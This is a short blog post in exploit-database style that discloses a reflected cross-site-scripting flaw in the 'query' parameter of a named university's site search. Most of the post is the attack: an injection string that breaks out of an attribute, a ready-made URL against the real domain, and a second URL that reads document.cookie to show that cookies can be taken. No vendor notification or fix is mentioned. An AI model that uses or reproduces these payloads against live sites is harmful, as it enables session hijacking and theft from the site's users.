Saturday, 22 April 2017

On 00:01 by admin   No comments
--------------------------
In the name of god
--------------------------

Exploit Title :
-------------------
London's Global University Cross-Site-Scripting Vulnerability


Exploit Author :
---------------------
4TT4CK3R


Date :
----------
2017/Apr/21


HomePage :
------------------
https://www.ucl.ac.uk


Vendor Page :
---------------------
https://www.ucl.ac.uk/maps/index.php


Parameter Name :
--------------------------
query


Description :
------------------
Our Script is :

""/>"certi"<script>alert("4TT4CK3R")</script>"/certi"

ok. Now we can insert this script for query parameter.

we will have :

http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(%224TT4CK3R%22)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go

and you can get cookies :

http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go

ok this university have a Cross-site-Scripting vulnerability!

0 comments:

Post a Comment